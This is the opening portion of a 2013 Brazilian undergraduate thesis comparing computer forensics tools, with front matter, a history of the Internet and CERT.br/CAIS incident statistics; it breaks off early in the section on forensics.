2013 - 1sem - Sebastião Garcia Torres Filho PDF

INSTITUTO FEDERAL DE CIÊNCIA E TECNONOLOGIA DE SÃO PAULO
CÂMPUS SÃO JOÃO DA BOA VISTA
SEBASTIÃO GARCIA TORRES FILHO
Perícia Forense Computacional: levantamento e comparação de técnicas e

ferramentas
São João da Boa Vista

2013
Sebastião Garcia Torres Filho
Perícia Forense Computacional: levantamento e comparação de técnicas e

ferramentas
Trabalho de conclusão de curso apresentado ao Instituto Federal

de São Paulo, como parte dos requisitos para a obtenção do grau
de Tecnólogo em Sistemas para Internet.
Área de Concentração: Perícia Forense Computacional
Orientador: Prof. Roan Simões da Silva
São João da Boa Vista

2013
Autorizo a reprodução e divulgação total ou parcial deste trabalho, por qualquer
meio convencional ou eletrônico, para fins de estudo e pesquisa, desde que
citada a fonte.
Ficha catalográfica preparada pela Seção de Tratamento

da Informação do Serviço de Biblioteca – IFSP
Filho, Sebastião G. T.
Perícia Forense Computacional: levantamento e
comparação de técnicas e ferramentas. / Sebastião Garcia
Torres Filho; orientador Roan Simões da Silva. São João
da Boa Vista, 2012.
Trabalho de Conclusão de Curso, IFSP, 2013.
1. Internet. 2. Segurança. 3. Ataques. Perícia

Forense.
I. Perícia Forense: levantamento e comparação de

técnicas e ferramentas
AGRADECIMENTOS
Agradecimentos para as pessoas que auxiliaram no trabalho assim como meu orientador, aos
participantes das bancas que fizeram considerações muito importantes para o aperfeiçoamento
do documento e do trabalho como um todo e a bibliotecária por sua atenção e ajuda com
todos os detalhes referentes à norma.
Um agradecimento especial aos meus pais, minha irmã e meus amigos pela paciência até o
término do mesmo.
E por último a grande guerreira e guerreiros do meu módulo, que lutaram ao meu lado sem
cansar e nunca pensar em desistir, o verdadeiro espírito de campeões.
O meu grande agradecimento a todas essas pessoas, por sua motivação, companheirismo,
solidariedade e atenção.
“Lutem e lutem novamente, até que os
cordeiros virem leões.”
RESUMO
FILHO, Sebastião G. T. (2013). Perícia Forense Computacional: levantamento e

comparação de técnicas e ferramentas. Trabalho de Conclusão de Curso - Instituto Federal
de São Paulo, São João da Boa Vista, 2013.
A Internet se tornou muito popular no Brasil e no mundo, esta popularidade se deu

principalmente a facilidade de acesso, já que tendo um smartphone nas mãos que dê suporte a
esta tecnologia, o usuário poderá começar a navegar. Porém, para uma grande quantidade
destes usuários, desconhecem os perigos escondidos ou acabam esquecendo de se proteger.
Para esses usuários, a segurança acaba passando despercebida, deixando de tomar
cuidados como a instalação de antivírus e a configuração do firewall da máquina, mesmo que
sejam suas configurações padrões, tornando-se alvos fáceis para muitos ataques.
A perícia forense computacional ajuda a descobrir e tratar esses casos em que o
computador foi invadido, seja em computadores domésticos ou empresariais.
O presente trabalho apresenta uma análise das ferramentas utilizadas, como por
exemplo, o live cd do Helix, Autopsy, entre outros softwares utilizados durante o processo de
perícia forense computacional. Mostrar através de critérios, como por exemplo, o tempo de
resposta para retornar a informação, qual poderia ser a melhor opção de ferramenta.
Apresenta uma abordagem das novas leis relacionadas aos crimes cometidos no
ambiente virtual, a metodologia que é utilizada na maioria das investigações, os perfis de
invasores e os principais mecanismos de intrusão.
Palavras-chave: Internet. Segurança. Ataques. Perícia Forense.

ABSTRACT
FILHO, Sebastião G. T. (2013). Computational Forensics: survey and comparison tools and
techniques. Course Conclusion Project – Instituto Federal de São Paulo, São João da Boa
Vista, 2013.
The Internet has become very popular in Brazil and worldwide, this popularity was
mainly the ease of access, since having a smartphone in the hands that supports this
technology, the user can start browsing. But for a lot of users, unaware of the hidden dangers
or they forget to protect yourself.
For these users, the security ends unnoticed, leaving to take care as installing antivirus
and firewall configuration of the machine, even if its default settings, making it an easy target
for many attacks.
The forensic computing helps find and treat these cases in which the computer has
been invaded, either in home or office computers.
This paper presents an analysis of the tools used, such as the live cd Helix, Autopsy,
among other software used during the process of forensic computing. Show through criteria
such as response time to return the information, which could be the best tool option.
Presents an approach to new laws relating to crimes committed in the virtual
environment, the methodology that is used in most investigations, the profiles of invaders and
the main mechanisms of intrusion.
Keywords: Internet. Security. Attacks. Forensics.

LISTA DE FIGURAS
Figura 1 – Total de Incidentes Reportados ao CERT.br por Ano, entre 1999 e 2013 .. 25
Figura 2 – Incidentes reportados ao CAIS por ano ................................................. 32
Figura 3 – Incidentes Reportados ao CERT.br (por dia da semana). ......................... 33
Figura 4 – Relação Ciência da Computação, Criminalística e Computação Forense. .. 34
Figura 5 – Incidentes reportados ao CERT.br (Tipos de ataques) ............................. 47
Figura 6 – Comparativo de malwares por plataformas móveis. ................................ 49
Figura 8 – Tentativas de fraudes reportadas........................................................... 54
Figura 7 – Equipamento para a recuperação de HD – Data Compass. ...................... 64
Figura 9 – Abrindo o console do Metasploit. ......................................................... 76
Figura 10 – Comando Espia mais o resultado retornado após sua execução. ............. 78
Figura 11 – Programa Autopsy. ............................................................................ 78
Figura 12 – Linhas de códigos para a criação da imagem do HD. ............................ 79
Figura 13 – Informações do sistema operacional no software. ................................. 80
Figura 14 – Processos que estão sendo executados na máquina alvo. ....................... 81
Figura 15 – Processos que estão sendo executados na máquina alvo. ....................... 81
Figura 16 – Comando para realizar o dump de rede. ............................................... 82
Figura 17 – Abertura do dump com o software Wireshark. ..................................... 82
Figura 18 – Descriptografando o tráfego entre os dois endereços identificados. ........ 83
Figura 19 – Interface do Security Scan. ................................................................ 84
Figura 20 – Interface apresentado os resultados de forma genérica. ......................... 85
Figura 21 – Resultados retornados no formato HTML. ........................................... 86
Figura 22 – Espera da requisição e aceite do aplicativo Java. .................................. 88
Figura 23 – Acesso ao prompt de comando da máquina alvo................................... 88
Figura 24 – Criação e edição do arquivo de texto na máquina alvo. ......................... 89
Figura 25 – Aquisição da mídia. .......................................................................... 89
Figura 26 – Aquisição da nova mídia utilizando o FTK. ......................................... 90
Figura 27 – HD escolhido juntamente com a extensão do arquivo. .......................... 90
Figura 28 – Opções para a entrada desejada, seguido do caminho até o arquivo
gerado. ............................................................................................ 91
Figura 29 – Aba contendo os históricos de navegabilidade na Internet. .................... 92
Figura 30 – Encontrando o arquivo excluído. ........................................................ 93
Figura 31 – Abrindo o arquivo da imagem criada do HD. ....................................... 93
Figura 32 – Tela de navegação da ferramenta e informações da pasta Teste. ............. 94
Figura 33 – Tela com a disposição do conteúdo da ferramenta................................. 95
Figura 34 – Nova busca com Security Scan. .......................................................... 95
Figura 35 – Resultados retornados. ....................................................................... 96
Figura 36 – Software EaseUS Partition Recovery................................................... 97
Figura 37 – Resultados retornados pelo EaseUS Partition Recovery......................... 97
Figura 38 – Resultados retornados pelo FreeRecover. ............................................ 98
Figura 39 – Software Data Recovery. ................................................................... 99
Figura 40 – Gráfico com o tempo de resposta das ferramentas. .............................. 104
Figura 41 – Informação contida dentro dos pacotes do protocolo TCP.................... 105
Figura 42 – Gráfico com o tempo de resposta das ferramentas. .............................. 109
LISTA DE TABELAS
Tabela 1 - Expectativa esperada pelos dados. ............................................... 40

Tabela 2 - Ferramentas para Análise Forense. .............................................. 72
Tabela 3 - Resumo do cenário 01. .................................................................. 75
Tabela 4 - Envenenamento do arquivo executável. ........................................ 76
Tabela 5 - Tomada de posse do computador alvo. ......................................... 77
Tabela 6 - Criação de uma imagem do HD..................................................... 79
Tabela 7 - Resumo do cenário 02. .................................................................. 86
Tabela 8 - Comandos realizados para a invasão utilizando o java. ................ 87
LISTA DE SIGLAS
AIR Automated Image and Restore – Restauração e Automatização de
Imagem
ARPA Advanced Research Projects – Agência de Pesquisa de Projetos
Avançados
ATA Advanced Technology Attachment – Acessório de Tecnologia
Avançado
CAIS Centro de Atendimento a Incidentes de Segurança
CD-ROM Compact Disc-Read Only Memory – Disco Compacto – Memória
Somente de Leitura
CERT.br Centro de Estudos, Repostas e Tratamento de Incidentes de Segurança
no Brasil
DNS Domain Name System – Sistema de Nomes de Domínio
DoS Denial of Service – Negação de Serviço
DVD Digital Video Disc – Disco Digital de Vídeo
ENEM Exame Nacional do Ensino Médio
Ext Extended File System – Sistema de Arquivos Alargados
FAT File Allocation Table – Tabela de Alocação de Ficheiros
FTK Forensic Toolkit – Kit de Ferramentas Forenses
HD Hard Disk – Disco Rígido
HTML HyperText Markup Language – Linguagem de Marcação de
HiperTexto
HTTP HyperText Transfer Protocol – Protocolo de Transferência de
HiperTexto
IDE Integrated Drive Eletronics – Controladora Integrada
IMP Interface Message Protocol – Protocolo de mensagens de interface
NTFS New Technology File System – Nova Tecnologia em Sistema de
Arquivo
PDA Personal Digital Assistants – Assistente Pessoal Digital
PDF Portable Document Format – Formato de Arquivo Portável
PNG Portable Network Graphics - Gráfico de Rede Portátil
RAM Random Access Memory – Memória de Acesso Aleatório
RNP Rede Nacional de Ensino e Pesquisa
SATA Serial Advanced Technology Attachment – Acessório de Tecnologia
Avançado Serial
SCSI Small Computer System Interface – Interface Pequena para Sistema
Computacional
SOP Standard Operating Procedures – Procedimentos Operacionais
TCP/IP Transmission Control Protocol/Internet Protocol – (Protocolo de
Transmissão/Protocolo de Internet)
URI Uniform Resource Identifier – Identificador Uniforme de Recursos
URL Uniform Resource Locator – Localizador Padrão de Recursos Padrão
USB Universal Serial Bus – Barramento Universal Serial

SUMÁRIO
1 INTRODUÇÃO ....................................................................................................... 23
1.1 MOTIVAÇÃO ...................................................................................................................... 24
1.2 OBJETIVOS ......................................................................................................................... 26
1.3 ORGANIZAÇÃO DESTE TRABALHO ............................................................................. 26
2 PESQUISA BIBLIOGRÁFICA ............................................................................. 27
2.1 A INTERNET E SEU FUNCIONAMENTO ....................................................................... 27
2.2 A IMPORTÂNCIA DA SEGURANÇA DA INFORMAÇÃO ............................................ 32
2.3 PERÍCIA FORENSE ............................................................................................................ 34
2.3.1 Coleta das Informações ................................................................................................... 35
2.3.2 Volatilidade da Informação............................................................................................. 39
2.3.3 Sistemas de Arquivos ....................................................................................................... 40
2.3.3.1 Sistema de Arquivos GNU/Linux ................................................................................. 41
2.3.3.2 Sistema de Arquivos Windows™ ................................................................................. 43
2.4 PERFIL DO INVASOR ....................................................................................................... 44
2.5 CONHECENDO MAIS SOBRE ATAQUES ...................................................................... 46
2.5.1 Tipos de Ataques e Outras Técnicas: ............................................................................. 49
2.6 LEGISLAÇÃO ..................................................................................................................... 54
2.7 OPERAÇÕES DA POLÍCIA FEDERAL ............................................................................ 59
2.8 TRABALHOS RELACIONADOS ...................................................................................... 60
2.8.1 Análise Forense em sistemas GNU/Linux ...................................................................... 60
2.8.2 Análise Forense de Intrusões em Sistemas Computacionais: Técnicas,
Procedimentos e Ferramentas .................................................................................................. 60
2.8.3 Perícia Forense Aplicada à Informática ........................................................................ 61

3 METODOLOGIA ................................................................................................... 63
3.1 FERRAMENTAS DE PERÍCIA FORENSE........................................................................ 63
3.1.1 Ferramentas para a Recuperação de Dados no HD:..................................................... 63
3.1.2 Ferramentas para a Recuperação de Dados: ................................................................. 66
3.1.3 Ferramentas para Análise de Arquivo: .......................................................................... 67
3.1.4 Ferramentas para a Extração de Metadados de Documentos: .................................... 68
3.1.5 Ferramentas para Análise de Memória: ........................................................................ 68
3.1.6 Ferramentas para Análise de Log: ................................................................................. 69
3.1.7 Conjunto de Ferramentas para a Realização de uma Análise Forense ....................... 70
3.2 ESTRUTURA UTILIZADA PARA O DESENVOLVIMENTO DOS CENÁRIOS........... 72
3.2.1 Hardware .......................................................................................................................... 72
3.2.2 Software ............................................................................................................................ 72
3.2.3 Configuração .................................................................................................................... 73
3.2.4 Justificativa ....................................................................................................................... 74
3.3 CENÁRIO 01 ........................................................................................................................ 75
3.4 CENÁRIO 02 ........................................................................................................................ 86
4 RESULTADOS ..................................................................................................... 101
4.1 METODOLOGIA PARA ANÁLISE DOS RESULTADOS ............................................. 101
4.2 CENÁRIO 01 ...................................................................................................................... 101
4.2.1 Praticidade para o Manuseio da Ferramenta .............................................................. 102
4.2.2 Quantidade de Informações Retornadas...................................................................... 102
4.2.3 Tempo de Reposta da Ferramenta................................................................................ 103
4.2.4 Dificuldade na Análise das Informações ...................................................................... 104
4.3 CENÁRIO 02 ...................................................................................................................... 106
4.3.1 Praticidade para o Manuseio da Ferramenta .............................................................. 106
4.3.2 Quantidade de Informações Retornadas...................................................................... 107
4.3.3 Tempo de Reposta da Ferramenta................................................................................ 108

4.3.4 Dificuldade na Análise das Informações ...................................................................... 109
5 CONCLUSÕES...................................................................................................... 111
5.1 TRABALHOS FUTUROS ................................................................................................. 112
REFERÊNCIAS .......................................................................................................... 115

Capítulo
23
1 INTRODUÇÃO
A rede mundial de computadores, Internet, é muito utilizada hoje já que se tornou fácil
e prático o seu manuseio.
Para muitos usuários sem grande conhecimento, o uso dessa tecnologia esconde
inúmeras armadilhas de pessoas que possuem o objeto de causar algum dano ou obter
vantagem.
A segurança da informação, especialmente nos dias atuais onde a informação é
armazenada eletronicamente, possui uma importância estratégica muito maior em comparação
ao tempo que as informações eram armazenadas exclusivamente em papel. Essa importância
se justifica, pois consiste em uma proteção da informação a vários tipos de ameaças, com o
objetivo de garantir a continuidade dos dados, a minimização do risco e maximizar o retorno
de investimentos, visando assim explorar as oportunidades do negócio (ABNT, 2005).
Uma maneira de implementar adequadamente a segurança da informação, ocorre
através da implantação de um conjunto de controles adequados, incluindo políticas, processos,
procedimentos, estruturas organizacionais e funções de software e hardware. Onde esses
controles devem ser estabelecidos, implementados, monitorados, analisados criticamente e
melhorados (ABNT, 2005).
Dentro da segurança da informação, existem seis aspectos básicos, mas que são de
muita importância, segundo a Associação Brasileira de Normas Técnicas (ABNT, 2005):
• Confidencialidade – o sistema deve permitir que determinado usuário possa ter

acesso a alguma informação que os demais não podem ou não estão autorizados
para este tipo de solicitação;
• Integridade – a informação deve estar correta, sem qualquer tipo de alteração,
assim mantendo seu aspecto verdadeiro;
• Disponibilidade – onde as informações precisam estar sempre à disposição dos
usuários, quando forem solicitadas.
24
• Autenticação – forma de garantir que o usuário é realmente quem informa ser,

ao fazer uma solicitação da informação;
• Não repúdio – capacidade de provar que determinada ação foi feita por aquele
usuário, impedindo assim que ele negue o fato; e
• Legalidade – é a garantia de que o sistema esteja atendendo a legislação, em
qualquer esfera jurídica e também as políticas internas de uma empresa.
Dentro da área da segurança da informação, existe uma subárea denominada perícia

forense computacional, a qual será descrita em maiores detalhes no decorrer deste trabalho. A
perícia forense computacional pode receber outros nomes, como por exemplo, computação
forense, forense computacional, criminalística computacional, forense digital, investigação
eletrônica e perícia eletrônica tratam-se de uma área que consiste a utilização de
conhecimentos da informática e técnicas de investigação policial, com o objetivo de obter
evidências de crimes digitais. Os métodos da perícia forense visam identificar, preservar,
analisar e documentar evidências localizadas em computadores e em outros dispositivos
eletrônicos (FREITAS, 2006).
1.1 MOTIVAÇÃO
A cada dia um grande número de incidentes de segurança ocorre, colocando em risco

empresas e usuários comuns. A Figura 1 apresenta o gráfico que demonstra a quantidade de
incidentes reportados ao Centro de Estudos, Repostas e Tratamento de Incidentes de
Segurança no Brasil (CERT.br, 2013a), no período entre 1999 a março de 2013.
25
Figura 1 – Total de Incidentes Reportados ao CERT.br por Ano, entre 1999 e 2013
Fonte: Estatística de Incidentes Reportados ao CERT.br
Como mostrado na Figura 1, o gráfico apresenta que 90.628 notificações foram

recebidas no primeiro trimestre de 2013. Tal número foi 4% maior ao trimestre anterior. No
primeiro trimestre de 2013, o CERT.br recebeu 5.000 notificações de máquinas que foram
comprometidas, o qual corresponde a um aumento de cerca de 146% em relação ao número
de notificações recebidas no último trimestre de 2012. Porém, a maioria das notificações de
computadores que foram comprometidos foi referente a servidores Web, os quais tiveram suas
páginas desfiguradas (CERT.br, 2013a).
São muitas as causas de invasões e muitos dos incidentes de segurança estão
relacionados à falta de mecanismos de segurança adequados, carência no conhecimento de
como agir quando é identificado um tipo de invasão e ausência de mecanismos para
identificar os ataques, o que dificulta a análise dos ataques (STEWART, TITEL, CHAPPEL,
2008).
Diante disso, um computador sem um mecanismo de defesa adequado, se torna muito
vulnerável a danos, como por exemplo, comprometimento e anomalia do sistema, roubo de
informações, além do travamento ou estado de inoperância do sistema.
A perícia forense pode ajudar na solução destes problemas, desde que haja uma coleta
de dados, que permita identificar o que aconteceu, quais danos foram causados e
consequentemente, correção das vulnerabilidades encontradas para prevenir futuras invasões
similares.
26
1.2 OBJETIVOS
O objetivo deste trabalho é fazer um levantamento de ferramentas relevantes e técnicas

para perícia forense, além de realizar um estudo de caso comparando algumas ferramentas,
por meio de ataques realizados em um computador pessoal, para mostrar como cada uma se
comporta dentro de cenários distintos.
Para a realização do levantamento das informações dos ataques, foram efetuados testes
dentro de cenários controlados.
É apresentada também, uma pesquisa sobre as novas leis criadas para julgar crimes
cometidos no ambiente virtual.
1.3 ORGANIZAÇÃO DESTE TRABALHO
No primeiro capítulo é apresentada uma introdução, sobre segurança da informação,

bem como conceitos de perícia forense. Trata a motivação e o objetivo deste trabalho.
No capítulo dois, poderá ser visto a pesquisa bibliográfica, que trará alguns trabalhos
de autores que abordam sobre o assunto principal do trabalho, a perícia forense
computacional.
O capítulo três constituí o desenvolvimento do trabalho, onde serão apresentados um
levantamento das ferramentas, os cenários, os ataques utilizados e o desempenho das
ferramentas forenses utilizadas para a realização do mesmo.
No capítulo quatro serão mostrados resultados dos desempenhos das ferramentas
dentro de cada cenário criado no capítulo três.
No quinto capítulo serão apresentadas as conclusões finais do trabalho.
Capítulo
27
2 PESQUISA BIBLIOGRÁFICA
A Internet é muito utilizada hoje em comparação na época do seu surgimento. Será

apresentado uma história da criação e seu funcionamento na seção seguinte.
2.1 A INTERNET E SEU FUNCIONAMENTO
Pode-se dizer que a ideia de utilização da Internet conhecida hoje surgiu no final da
década de 1950. Era um momento crítico, pois os Estados Unidos estava em plena Guerra
Fria e o seu Departamento de Defesa precisava de uma rede que conseguisse sobreviver
mesmo em meio a um ataque nuclear. Na época, todas as informações militares passavam por
redes de telefonia pública consideradas, naquele tempo, vulneráveis. Caso acontecesse um
ataque a algumas centrais, denominadas interurbanas, resultaria em uma fragmentação do
sistema em muitas ilhas isoladas (TANENBAUM, 2003).
Em meados de 1969, o governo criou a Agência de Pesquisa de Projetos Avançados
(ARPA) com o objetivo de adquirir certa superioridade tecnológica no campo militar em
relação à União Soviética, através de aquisição de conhecimentos compartilhados,
principalmente pelas universidades da época (CASTELLS, 2003).
A agência criou a então conhecida ARPANET, que consistia em uma sub-rede com
minicomputadores chamados de Interface Message Protocol - Protocolo de mensagens de
interface (IMPs), conectados através de uma transmissão de 56 kbps1. Está rede foi construída
de forma que utilizassem datagramas2, ou seja, se algumas linhas ou IMPs fossem destruídas,
as mensagens seriam roteadas para outros caminhos alternativos de forma automática
(TANENBAUM, 2003).
1
kbps – termo utilizado para medir o volume de dados em transmissões.
2
Datagramas – é uma unidade de transferência básica associada a uma rede (TANENBAUM, 2003).
28
Deste modo, cada nó3 da rede deveria ter um IMP e um host em uma mesma sala,
além de serem comunicados por um fio curto. Essa sub-rede foi à primeira rede por
comutação de pacotes do estilo store-and-forward (de armazenamento e encaminhamento)
(TANENBAUM, 2003).
Após os testes e a comprovação de que a rede funcionava muito bem diante de uma
estrutura pequena, surgiu à ideia de uma rede experimental que contava com apenas 15 nós,
onde três deles poderiam ser encontrados na Universidade da Califórnia em Los Angeles,
Universidade da Califórnia em Santa Barbara e na Universidade de Utah (CASTELLS, 2003).
Com o sucesso dos testes, houve um crescimento rápido à medida que outros IMPs
foram instalados. Logo todo o território norte-americano foi tomado por essa rede.
A partir dessa experiência, concluiu-se que os protocolos que a ARPANET utilizava
não eram adequados para a execução de várias redes. Em seguida, realizaram novas pesquisas
a fim de encontrar algo que atendesse os requisitos, foi criado então o conjunto de protocolos
e o modelo Transmission Control Protocol/Internet Protocol – Protocolo de
Transmissão/Protocolo de Internet (TCP/IP), com o objetivo específico de manipular a
comunicação sobre inter-redes (TANENBAUM, 2003).
Uma rede que crescia em paralelo com a ARPANET, era a NSFNET. A NFSNET foi
criada pela National Science Foundation – Fundação Nacional de Ciência (NFS) com a ideia
de tornar a tecnologia que a ARPANET possuía aberta, pois para utilizar qualquer recurso que
a ARPA disponibilizava era preciso antes ter um contrato com o Departamento de Defesa dos
Estados Unidos (contrato esse na época muito difícil de conseguir). Essa tecnologia consistia
em construir uma rede de backbone4 a fim de conectar seus seis centros de
supercomputadores e, para cada supercomputador, existia um microcomputador, onde estes
estavam conectados a linhas privadas (conceito que era implantando na ARPANET), já sua
ideia de software era diferente da ARPA, pois desde o início já se comunicavam entre si
utilizando do TCP/IP diretamente.
3
O nó pode corresponder a um único dispositivo ou a um conjunto de dispositivos, como por exemplo,
computadores, impressoras, roteadores, etc (TANENBAUM, 2003).
4
Backbone pode ser definido como um canal central, destinado a transferir o tráfego da rede de alta velocidade,
maximizando assim a confiabilidade e o desempenho nas comunicações de longas distâncias dos dados
(TANENBAUM, 2003).
29
Quando o TCP/IP se tornou oficial, em 1° de janeiro de 1983, a ARPANET cresceu

rapidamente sua utilização e, no momento em que a ARPANET e a NSFNET se
interconectaram, o crescimento foi exponencial. Desde então, as pessoas começaram a
enxergar um conjunto de redes como uma inter-rede e, mais tarde, como a Internet
propriamente dita (TANENBAUM, 2003).
A Internet pode ser entendida como uma rede de computadores, ou seja, um conjunto
de computadores autônomos interconectados por diversas tecnologias. Suas trocas de
mensagens não precisam ser feitas obrigatoriamente através do fio de cobre, mas também
podem utilizar fibras ópticas, micro-ondas, ondas de infravermelho e satélites de
comunicações. Com tamanha variedade de transmissão de dados, surge a possibilidade de se
criar muitos tipos de redes, que variam no tamanho (quantos computadores podem ser
interligados), nos modelos e até em sua forma. Alguns exemplos destas redes são descritos
por Castells (2003):
• ARPANET (1969) – a ideia inicial de redes de comunicação;

• PRNET e SATNET – a ARPANET se conectou com essas redes de comunicações que
a ARPA administrava, foi nesse momento em que se criou o termo rede de redes;
• BBS (meados da década de 1970) – outro componente que colaborou para a formação
da Internet em que hoje conhecemos, foi de um componente denominado por bulletin
board systems (BBS), ou também sistema de quadro de avisos;
• DCA (1975) – a ARPANET foi transferida para a Defense Communication Agency
(DCA), nesse momento se optou por conectar várias redes sob seu controle, a fim de
tornar disponível a comunicação para os vários ramos das forças armadas;
• Programa UUCP (1978) – um marco para a Internet. Um software desenvolvido por
usuários do UNIX com o código fonte totalmente aberto, ou seja, qualquer um que
possuísse conhecimento poderia alterar suas linhas para aperfeiçoá-los. Em 1980, foi
distribuída uma versão gratuíta dele em uma conferência. No verão daquele mesmo
ano, um grupo de estudantes desenvolveu um programa que serviria de ponte entre a
ARPANET e a Usenet (nome dado à rede que utilizava o programa UUCP). Nesse
momento, conseguiu-se interligar duas redes de computadores que usavam tecnologias
diferentes, provando que mesmo tendo tecnologias distintas, era possível fazer a
comunicação entre elas;
30
• BITNET (1981) – uma rede experimental utilizando como base o protocolo RJE da
IBM, existindo até hoje cerca de 30.000 nós ativos;
• MILNET (1983) – foi uma rede independente para usos militares;
• FIDONET (1983) – tinha o mesmo conceito que o programa de BBS, onde até hoje a
FIDONET é a rede de comunicação por computadores mais baratos e mais acessíveis
do mundo. Um exemplo disso que até o ano 2000, abrangia cerca de 40.000 nós e por
volta de três milhões de usuários;
• NSFNET (1984) – a National Science Foundation (NSF) criou sua própria rede de
comunicação, a NSFNET; e
• World Wide Web (1990) – uma aplicação desenvolvida por um programador inglês
(Tim Berners-Lee) que permitiu a Internet abarcar o mundo todo. O software permitia
obter e acrescentar informação de e para qualquer outro computador conectado através
da Internet: HyperText Transfer Protocol – Protocolo de Transferência de HiperTexto
(HTTP), HyperText Markup Language – Linguagem de Marcação de HiperTexto
(HTML) e Uniform Resource Identifier – Identificador Uniforme de Recursos (URI,
mais tarde conhecida como Uniform Resource Locator – Localizador Padrão de
Recursos (URL)). Robert Cailliau Berners-Lee criou um software navegador/editor em
dezembro do mesmo ano, e batizou o sistema de hipertexto de world wide web, a rede
mundial de computadores.
Segundo Tanenbaum (2003), o interesse dos usuários que buscam a Internet pode ser
dividido em três áreas de atuação:
• Usuário Comercial – diante do fato das empresas possuírem um número significativo

de computadores, independente do porte, era preciso ter um meio para que essas
máquinas se comunicassem, pois era fácil acessar todas as informações necessárias se
os computadores estivessem em uma mesma sala ou até mesmo dentro do mesmo
prédio, mas era difícil se existe informações em outros lugares fora do ambiente
central. Visando essa melhoria e a capacidade de compartilhamento de recursos, criou-
se um modelo denominado cliente/servidor, onde os dados são armazenados em
poderosos computadores e o funcionário, ao precisar consultar, alterar ou excluir
alguma dessas informações armazenadas, bastava acessar o servidor para tê-las em
mãos independente da distância que estavam entre si. Essa facilidade na obtenção das
31
informações sempre acessíveis, quando necessário, só foi possível depois da criação

das redes de computadores;
• Usuário Doméstico – a utilização dos computadores, dentro dos lares das
pessoas, no começo era principalmente para processamento de textos e jogos,
mas agora, a maior motivação seja o acesso à Internet, em especial para alguns
serviços como: acesso a informações remotas, comunicação entre pessoas,
entretenimento interativo, comércio eletrônico e redes sociais; e
• Usuários Móveis – os usuários veêm a necessidade de acesso às informações,
mesmo estando longe de suas casas e escritórios, utilizando de qualquer
equipamento que forneça este tipo de facilidade, sejam eles notebooks, netbooks,
Personal Digital Assistants – Assistente Pessoal Digital (PDAs), smartphones5 e
tablets6. Basta ter acesso a uma rede sem fio, seja ela uma rede wireless (Wi-Fi)
ou redes fornecidas por operadoras de telefonia móveis7, assim o usuário tem
acesso normal e livre como se estivesse em seu escritório ou em sua casa.
Mas para que essas máquinas e dispositivos móveis consigam ter acesso,
primeiramente, é necessário estar conectado à Internet, depois executar uma pilha de
protocolos TCP/IP, devem possuir também um endereço IP e enviar pacotes IP a todos os
outros dispositivos na rede conectada (TANENBAUM, 2003).
Analisando mais profundamente o protocolo e o modelo TCP/IP, podemos constatar
alguns problemas. A primeira dificuldade é o fato do TCP/IP não conseguir diferenciar
conceitos de serviços, interface e protocolo. Além desse problema, o TCP/IP não é tão
abrangente e consequentemente, não consegue descrever outras pilhas de protocolos que não
a dele mesmo. Existe também o fato da camada de rede não ser realmente uma camada no
sentido em que é empregado em um contexto dos protocolos hierarquizados. Um fato muito
importante é que o modelo TCP/IP não faz nenhum tipo de diferenciação no que diz respeito a
camadas físicas e de enlace de dados. Apesar das dificuldades e de o modelo ser praticamente
inexistente, são utilizados em larga escala (TANENBAUM, 2003).
5
Telefone celular com funcionalidades avançadas que podem ser executadas por seu sistema operacional
(TANENBAUM, 2003).
6
Dispositivo pessoal que possibilita acesso à Internet, visualização de fotos e vídeos, leitura de jornais, revistas,
livros e também entretenimento com jogos disponíveis para esse tipo de equipamento (TANENBAUM, 2003).
7
Também é considerada uma rede sem fio (wireless).
32
2.2 A IMPORTÂNCIA DA SEGURANÇA DA INFORMAÇÃO
Com o crescimento do uso da Internet, houve também um crescimento nos crimes

cometidos no mundo virtual, como por exemplo: invasões, roubos de informações e outros
tipos de ataques e vírus. A seguir, serão apresentados dois gráficos (Figura 2 e 3) que
comprovam essas informações.
Na Figura 2, é apresentado o avanço do número de incidentes de segurança reportados
entre janeiro de 1997 e abril de 2013 à Rede Nacional de Ensino e Pesquisa (RNP, 2013) que
atua na detecção, resolução e prevenção de incidentes de segurança através do Centro de
Atendimento a Incidente de Segurança (CAIS).
Figura 2 – Incidentes reportados ao CAIS por ano

Fonte: www.rnp.br/cais/estatisticas/index.php
O CAIS (2013) traz algumas informações que explicam melhor a Figura 2. O número
de incidentes durante o terceiro quadrimestre de 2013 foi cerca de 7,63% maior em relação ao
período entre maio e agosto do mesmo ano. As tentativas de ataques a sistemas tiveram uma
queda significativa, sendo cerca de 23,53% menor que a relação ao quadrimestre do ano
33
anterior (de 2.116 para 1.618 casos), porém ainda são números elevados. Já os casos de
máquinas que foram infectadas com Worm/Bot também registrou uma queda, de 29.492 para
24.197, representando 53,51% de incidentes tratados no período de setembro a dezembro de
2012. Dentro do mesmo intervalo (de setembro a dezembro de 2012) registrou 279 novas
fraudes no Catálogo de Fraudes do CAIS, somando um total de 4.495 fraudes desde o
lançamento deste serviço, em março de 2008.
Na Figura 3, apresentada a seguir, traz um comparativo de incidentes reportados ao
CERT.br (2013b) em dias da semana de janeiro a março de 2013.
Figura 3 – Incidentes Reportados ao CERT.br (por dia da semana).

Fonte: http://www.cert.br/stats/incidentes/2013-jan-mar/weekdays-incidentes.html
Como é possível visualizar na Figura 3, a quantidade de incidentes durante os dias da

semana, aponta que a segunda-feira é cerca de 80% maior em relação ao domingo (CERT.br
2013b).
É importante ressaltar que apesar dos gráficos apresentarem um número grande de
incidentes, estes dados se referem apenas os que foram reportados oficialmente. Existem
ainda muitos casos que não são relatados oficialmente, sendo tratados internamente nas
empresas ou por usuários comuns, ou em uma situação pior, que é quando os incidentes
sequer são percebidos pelos administradores de sistemas e não recebem o tratamento
adequado.
34
Desde a popularização da Internet, cada vez mais as informações, sejam elas pessoais
ou empresariais, tornaram-se muito importantes e, seu armazenamento, deve ser planejado a
fim de mantê-las seguras e íntegras, não acessíveis a pessoas cuja intenção é de roubá-las ou
danificá-las.
Em relação à análise destes incidentes, dentro do tema da segurança da informação,
existe uma subárea que é denominada por perícia forense, cuja responsabilidade é identificar,
preservar, analisar e documentar evidências localizadas em computadores a fim de encontrar
o invasor, os danos causados e, principalmente, para mostrar onde existem vulnerabilidades
no sistema, permitindo a correção adequada.
2.3 PERÍCIA FORENSE
Segundo Galvão (2009), a análise forense vem suprir a necessidade das instituições
legais na manipulação de evidências eletrônicas. Esta área estuda a aquisição, preservação,
identificação, extração, recuperação e análise dos dados em formato eletrônico. Desta forma,
produz informações de maneira direta e não de forma interpretativa.
Co mp u taç ão Fo r e ns e é a ciê n cia q u e tr ata d o ex a me, a n ál i se e

in v e st i gaç ão d e u m i nc id e n te co mp ut ac io na l, o u s ej a, q u e
en vo l va m a co mp u tação co mo meio , so b a ó t ic a fo r e n se, s e nd o ela
